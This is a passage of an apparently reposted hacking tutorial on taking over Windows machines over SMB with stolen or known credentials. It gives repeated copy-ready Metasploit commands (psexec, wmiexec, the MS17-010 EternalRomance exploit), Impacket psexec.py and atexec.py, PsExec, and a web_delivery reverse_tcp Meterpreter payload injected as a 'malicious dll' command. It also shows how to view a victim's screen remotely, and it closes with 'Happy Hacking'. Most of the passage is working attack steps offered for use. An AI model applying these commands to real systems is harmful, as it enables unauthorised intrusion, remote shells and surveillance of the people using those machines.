msf auxiliary(admin/smb/psexec_command) > set smbpass Ignite@123
msf auxiliary(admin/smb/psexec_command) > set COMMAND [Paste above copied dll code here]
msf auxiliary(admin/smb/psexec_command) > exploit
1
2
3
4
5
6
msf > use auxiliary/admin/smb/psexec_command
msf auxiliary(admin/smb/psexec_command) > set rhosts 192.168.1.104
msf auxiliary(admin/smb/psexec_command) > set smbuser administrator
msf auxiliary(admin/smb/psexec_command) > set smbpass Ignite@123
msf auxiliary(admin/smb/psexec_command) > set COMMAND [Paste above copied dll code here]
msf auxiliary(admin/smb/psexec_command) > exploit
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-uDfQHWCjcro/W4oz_jI8RRI/AAAAAAAAaCM/XjJ9E65p5iUZBz7VdBhH9JihYxLJgVTVwCEwYBhgL/s1600/5.png?w=687&ssl=1)
As soon as we run psexec auxiliary we will get a meterpreter session with as an administrator.
![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-aIifFaVQoCA/W4oz_8vGhAI/AAAAAAAAaCU/kpifMXxNHuAHZ_QL87ZZjks-ZXkq_pCeACEwYBhgL/s1600/6.png?w=687&ssl=1)
SMB Impacket WMI Exec
This module is a similar approach to psexec but executing commands through WMI.
msf > use auxiliary/scanner/smb/impacket/wmiexec
msf auxiliary(scanner/smb/impacket/wmiexec) > set rhosts 192.168.1.104
msf auxiliary(scanner/smb/impacket/wmiexec) > set smbuser administrator
msf auxiliary(scanner/smb/impacket/wmiexec) > set smbpass Ignite@123
msf auxiliary(scanner/smb/impacket/wmiexec) > set COMMAND systeminfo
msf auxiliary(scanner/smb/impacket/wmiexec) > exploit
1
2
3
4
5
6
msf > use auxiliary/scanner/smb/impacket/wmiexec
msf auxiliary(scanner/smb/impacket/wmiexec) > set rhosts 192.168.1.104
msf auxiliary(scanner/smb/impacket/wmiexec) > set smbuser administrator
msf auxiliary(scanner/smb/impacket/wmiexec) > set smbpass Ignite@123
msf auxiliary(scanner/smb/impacket/wmiexec) > set COMMAND systeminfo
msf auxiliary(scanner/smb/impacket/wmiexec) > exploit
![[Image: 7.1.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-A6iVrxBivQs/W4o0AXmCthI/AAAAAAAAaCY/syYfRW8QlCY80nOMqXYHGNNfxDfjv5ONgCEwYBhgL/s1600/7.1.png?w=687&ssl=1)
Impacket for Psexec.py
Psexec.py lets you execute processes on remote windows systems, copy files on remote systems, process their output and stream it back. It allows execution of remote shell commands directly with the full interactive console without having to install any client software.
Now let’s install the Impacket tools from GitHub. You can get it from here. Firstly, clone the git, and then install the Impacket and then run psexec.py to connect the victim’s machine.
git clone
[To see content please register here]
cd impacket/python setup.py install
cd examples
1
2
3
4
git clone
[To see content please register here]
cd impacket/python setup.py install
cd examples
Syntax: ./psexec.py [[domain/] username [: password] @] [Target IP Address]
./psexec.py SERVER/Administrator:[email protected]
1
./psexec.py SERVER/Administrator:[email protected]
![[Image: 7.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-QZUUjZQFZs8/W4o0Af8NblI/AAAAAAAAaCQ/w9nwN1ffFHcNiu5h0shHohX6UY4dtmWDwCEwYBhgL/s1600/7.png?w=687&ssl=1)
Impacket for Atexec.py
This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.
Syntax: /atexec.py [[domain/] username [: password] @] [Target IP Address] [Command]
./atexec.py SERVER/Administrator:[email protected] systeminfo
1
./atexec.py SERVER/Administrator:[email protected] systeminfo
As you can see below that a remote connection was established to the server and the command systeminfo was run on the Target server with the output of the command delivered on the Kali terminal.
![[Image: 9.1.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-3dw1ZvAgQlU/W4o0AjFnjsI/AAAAAAAAaCU/fkgC5F9mCJ44B94_yYeqAN-_Pdm2uMrlACEwYBhgL/s1600/9.1.png?w=687&ssl=1)
PsExec.exe
Psexec.exe is software that helps us to access other computers in a network. This software directly takes us to the shell of the remote PC with the advantage of doing nothing manually. Download this software from –>
[To see content please register here]
.Unzip the file once you have downloaded it. Go to your command prompt and type:
PsExec.exe\\192.168.1.104 -u administrator -p Ignite@123 cmd
1
PsExec.exe\\192.168.1.104 -u administrator -p Ignite@123 cmd
Here,
192.168.1.104 –> is the IP of the remote host
-u –> denotes username
-p –> denotes password
cmd –> to enter victim’s command prompt
![[Image: 9.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-edEs7FC_7FQ/W4o0BHpp56I/AAAAAAAAaCY/w3LtbzZ05jM0EkbxKKk9u18epgqpJMZFACEwYBhgL/s1600/9.png?w=687&ssl=1)
Atelier Web Remote Commander
This is graphical software that let us gain control of the victim’s PC that too quite easily.
Once you have open the software give the IP address of your victim’s PC in remote host box along with the username and password in their respective boxes. And then click on connect; the whole victim’s PC’s screen will appear on your Desktop and you will have a pretty good view of what your victim is doing.
![[Image: 10.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-RgBnSN7nHB0/W4oz9nUNHcI/AAAAAAAAaCU/rEwybaG_joc0dcxGRvzcDBF6D3u3bX62wCEwYBhgL/s1600/10.png?w=687&ssl=1)
As you can observe we are having Screen of victim’s machine in front of us.
![[Image: 11.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-gYG4ALQSWzg/W4oz9t8WWKI/AAAAAAAAaCM/SJ0qXD16ZxIYKiET_3ElRCGKzipOofHPwCEwYBhgL/s1600/11.png?w=687&ssl=1)
MS17-010 EternalRomance SMB Remote Code Execution
Tested on: Windows 2007 ultimate
Attacking Machine: Kali Linux
This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec payload code execution is done. Exploits a type of confusion between Transaction and write and requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit but requires a named pipe.
msf > use exploit/windows/smb/ms17_010_psexec
msf exploit(windows/smb/ms17_010_psexec) > set rhost 192.168.1.105
msf exploit(windows/smb/ms17_010_psexec) > set smbuser raj
msf exploit(windows/smb/ms17_010_psexec) > set smbpass 123
msf exploit(windows/smb/ms17_010_psexec) > exploit
1
2
3
4
5
msf > use exploit/windows/smb/ms17_010_psexec
msf exploit(windows/smb/ms17_010_psexec) > set rhost 192.168.1.105
msf exploit(windows/smb/ms17_010_psexec) > set smbuser raj
msf exploit(windows/smb/ms17_010_psexec) > set smbpass 123
msf exploit(windows/smb/ms17_010_psexec) > exploit
![[Image: 12.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-yvYGeD6H3jg/W4oz-VdmfMI/AAAAAAAAaCE/16P_kxBrPzQlNII5on2nv7zA3AI82PQKACEwYBhgL/s1600/12.png?w=687&ssl=1)
MS17-010 EternalRomance SMB Remote Command Execution
This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec command execution is done. Exploits a type of confusion between Transaction and write and requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit but requires a named pipe.
Thus, in a new Metasploit framework we had used web delivery module to get malicious dll code which we can use as an arbitrary command on the host.
use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set target 3
msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 192.168.1.106
msf exploit(multi/script/web_delivery) > exploit
1
2
3
4
5
use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set target 3
msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 192.168.1.106
msf exploit(multi/script/web_delivery) > exploit
Copy the highlighted text for malicious dll code.
![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-tKyEUMXosQA/W4oz-oDkWHI/AAAAAAAAaCI/G9Cqm0eT-cEEsgDK0TeO-7f_FNHFf1sXwCEwYBhgL/s1600/13.png?w=687&ssl=1)
msf > use auxiliary/admin/smb/ms17_010_command
msf auxiliary(admin/smb/ms17_010_command) > set rhosts 192.168.1.105
msf auxiliary(admin/smb/ms17_010_command) > set smbuser raj
msf auxiliary(admin/smb/ms17_010_command) > set smbpass 123
msf auxiliary(admin/smb/ms17_010_command) > set COMMAND [Paste above copied dll code here]
msf auxiliary(admin/smb/ms17_010_command) > exploit
1
2
3
4
5
6
msf > use auxiliary/admin/smb/ms17_010_command
msf auxiliary(admin/smb/ms17_010_command) > set rhosts 192.168.1.105
msf auxiliary(admin/smb/ms17_010_command) > set smbuser raj
msf auxiliary(admin/smb/ms17_010_command) > set smbpass 123
msf auxiliary(admin/smb/ms17_010_command) > set COMMAND [Paste above copied dll code here]
msf auxiliary(admin/smb/ms17_010_command) > exploit
![[Image: 14.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-eSoIjxatjd0/W4oz-zaaEWI/AAAAAAAAaCI/y1Z-blUmuuYzUDwbUIVBzF9iKd-0btoMACEwYBhgL/s1600/14.png?w=687&ssl=1)
As soon as we run psexec auxiliary we will get a meterpreter session with as an administrator.
In this way, we can compromise a victim’s machine remotely if we have login credential.
Happy Hacking!!!!
![[Image: 15.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-y0iYx0a5P8w/W4oz-zSI9lI/AAAAAAAAaCY/G1IDkRnV0HgfHoZCBK5YwzpHOgXckh5SQCEwYBhgL/s1600/15.png?w=687&ssl=1)
